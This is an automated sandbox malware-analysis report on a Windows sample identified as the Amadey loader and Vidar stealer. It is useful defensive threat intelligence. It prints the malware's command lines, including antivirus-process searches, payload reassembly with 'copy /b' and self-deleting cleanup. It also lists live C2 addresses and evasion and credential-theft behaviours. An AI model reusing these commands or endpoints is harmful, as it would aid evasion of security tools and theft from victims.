Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1494714
MD5:	44ae545ca405437b73165b8247a83569
SHA1:	632951c3548897f801d0c0fc3256cf788b7fb285
SHA256:	885e1d96bfbf210d1170054fddd7ec31c4c95ca6951a7be4f8ae3c07d1b9e6de
Tags:	exe
Infos:

Detection

Amadey, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 44AE545CA405437B73165B8247A83569)

axplong.exe (PID: 7528 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 44AE545CA405437B73165B8247A83569)

axplong.exe (PID: 7548 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 44AE545CA405437B73165B8247A83569)

axplong.exe (PID: 7264 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 44AE545CA405437B73165B8247A83569)

seo.exe (PID: 7372 cmdline: "C:\Users\user\AppData\Local\Temp\1000156001\seo.exe" MD5: 6F858C09E6D3B2DBD42ADC2FB19B217B)

cmd.exe (PID: 7412 cmdline: "C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7468 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7460 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7596 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7608 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7652 cmdline: cmd /c md 419591 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 5264 cmdline: findstr /V "SAVEDBEDFLESHPROVIDED" Waves MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7668 cmdline: cmd /c copy /b ..\Poll + ..\Memorabilia + ..\Kenny + ..\Rick + ..\Britannica + ..\Circuits J MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Predicted.pif (PID: 7684 cmdline: Predicted.pif J MD5: C56B5F0201A3B3DE53E561FE76912BFD)

cmd.exe (PID: 4900 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\419591\Predicted.pif" & rd /s /q "C:\ProgramData\EBGCFBGCBFHJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 5768 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

choice.exe (PID: 7700 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199751190313"], "Botnet": "1b47b87875b9774afdda9b2528e389d1"}

Threatname: Amadey

{"C2 url": ["http://185.215.113.16/Jo89Ku7d/index.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1658017115.00000000048E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000003.1685161264.0000000004830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000003.1688423939.0000000004830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1698207716.00000000000F1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000002.1725519016.0000000000041000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000007.00000003.2311850490.0000000004830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.1728683061.0000000000041000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: Predicted.pif PID: 7684	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Predicted.pif PID: 7684	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: Predicted.pif PID: 7684	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.Predicted.pif.49c8038.8.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x27b6:$x5: vchost.exe 0x47b6:$x5: vchost.exe
18.2.Predicted.pif.49a0000.7.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
18.2.Predicted.pif.1bac610.4.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
18.2.Predicted.pif.17e8428.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
18.2.Predicted.pif.1bac610.4.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
18.2.Predicted.pif.17e8428.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.axplong.exe.40000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.axplong.exe.40000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Predicted.pif J, CommandLine: Predicted.pif J, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7412, ParentProcessName: cmd.exe, ProcessCommandLine: Predicted.pif J, ProcessId: 7684, ProcessName: Predicted.pif

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7412, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7608, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:05:59.896500+0200
SID:	2028765
Severity:	3
Source Port:	49853
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:01.321045+0200
SID:	2028765
Severity:	3
Source Port:	49856
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:51.190982+0200
SID:	2028765
Severity:	3
Source Port:	49946
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:46.936625+0200
SID:	2028765
Severity:	3
Source Port:	49937
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:45.925681+0200
SID:	2028765
Severity:	3
Source Port:	49934
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:10.134516+0200
SID:	2028765
Severity:	3
Source Port:	49875
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:49.013750+0200
SID:	2028765
Severity:	3
Source Port:	49941
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:05:54.637145+0200
SID:	2028765
Severity:	3
Source Port:	49842
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.16

Timestamp:	2024-08-19T06:04:03.013346+0200
SID:	2856147
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:55.640385+0200
SID:	2028765
Severity:	3
Source Port:	49954
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:24.545934+0200
SID:	2028765
Severity:	3
Source Port:	49899
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:37.747838+0200
SID:	2028765
Severity:	3
Source Port:	49916
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:54.281222+0200
SID:	2028765
Severity:	3
Source Port:	49952
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:05:55.777587+0200
SID:	2028765
Severity:	3
Source Port:	49844
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.16

Timestamp:	2024-08-19T06:04:06.174070+0200
SID:	2044696
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:14.014025+0200
SID:	2028765
Severity:	3
Source Port:	49881
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:06.708283+0200
SID:	2028765
Severity:	3
Source Port:	49867
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:23.266633+0200
SID:	2028765
Severity:	3
Source Port:	49896
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:25.890970+0200
SID:	2028765
Severity:	3
Source Port:	49901
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:47.975383+0200
SID:	2028765
Severity:	3
Source Port:	49939
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:19.279581+0200
SID:	2028765
Severity:	3
Source Port:	49890
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:40.740456+0200
SID:	2028765
Severity:	3
Source Port:	49922
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:05:57.904139+0200
SID:	2049087
Severity:	1
Source Port:	49848
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.4 - Destination IP: 185.215.113.16

Timestamp:	2024-08-19T06:04:03.522338+0200
SID:	2019714
Severity:	2
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:17.621680+0200
SID:	2028765
Severity:	3
Source Port:	49887
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:15.861102+0200
SID:	2028765
Severity:	3
Source Port:	49884
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 195.201.118.191 - Destination IP: 192.168.2.4

Timestamp:	2024-08-19T06:05:59.218980+0200
SID:	2044247
Severity:	1
Source Port:	443
Destination Port:	49850
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:42.926693+0200
SID:	2028765
Severity:	3
Source Port:	49927
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:52.261132+0200
SID:	2028765
Severity:	3
Source Port:	49948
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:38.742162+0200
SID:	2028765
Severity:	3
Source Port:	49918
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:05.418564+0200
SID:	2028765
Severity:	3
Source Port:	49865
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:08.808642+0200
SID:	2028765
Severity:	3
Source Port:	49872
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:44.920583+0200
SID:	2028765
Severity:	3
Source Port:	49932
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:07.724657+0200
SID:	2028765
Severity:	3
Source Port:	49870
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:50.106924+0200
SID:	2028765
Severity:	3
Source Port:	49943
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:43.934074+0200
SID:	2028765
Severity:	3
Source Port:	49929
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:05:58.572052+0200
SID:	2028765
Severity:	3
Source Port:	49850
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:12.100518+0200
SID:	2028765
Severity:	3
Source Port:	49878
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:39.806322+0200
SID:	2028765
Severity:	3
Source Port:	49920
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 195.201.118.191 - Destination IP: 192.168.2.4

Timestamp:	2024-08-19T06:06:00.557854+0200
SID:	2051831
Severity:	1
Source Port:	443
Destination Port:	49853
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.16

Timestamp:	2024-08-19T06:04:08.200394+0200
SID:	2856147
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.16 - Destination IP: 192.168.2.4

Timestamp:	2024-08-19T06:04:03.276538+0200
SID:	2856122
Severity:	1
Source Port:	80
Destination Port:	49737
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:02.323246+0200
SID:	2028765
Severity:	3
Source Port:	49859
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:05:57.225681+0200
SID:	2028765
Severity:	3
Source Port:	49848
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 195.201.118.191

Timestamp:	2024-08-19T06:06:41.777490+0200
SID:	2028765
Severity:	3
Source Port:	49925
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199751190313"], "Botnet": "1b47b87875b9774afdda9b2528e389d1"}
Source: axplong.exe.7264.7.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.16/Jo89Ku7d/index.php"]}

Multi AV Scanner detection for domain / URL

Source: arpdabl.zapto.org	Virustotal: Detection: 12%			Perma Link
Source: http://arpdabl.zapto.org	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 55%
Source: file.exe	Virustotal: Detection: 60%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.201.118.191:443 -> 192.168.2.4:49842 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: Predicted.pif, 00000012.00000002.4100831968.000000006C04D000.00000002.00000001.01000000.0000000D.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.18.dr
Source:	Binary string: freebl3.pdb source: Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.18.dr
Source:	Binary string: freebl3.pdbp source: Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.18.dr
Source:	Binary string: nss3.pdb@ source: Predicted.pif, 00000012.00000002.4101354716.000000006C20F000.00000002.00000001.01000000.0000000C.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.18.dr
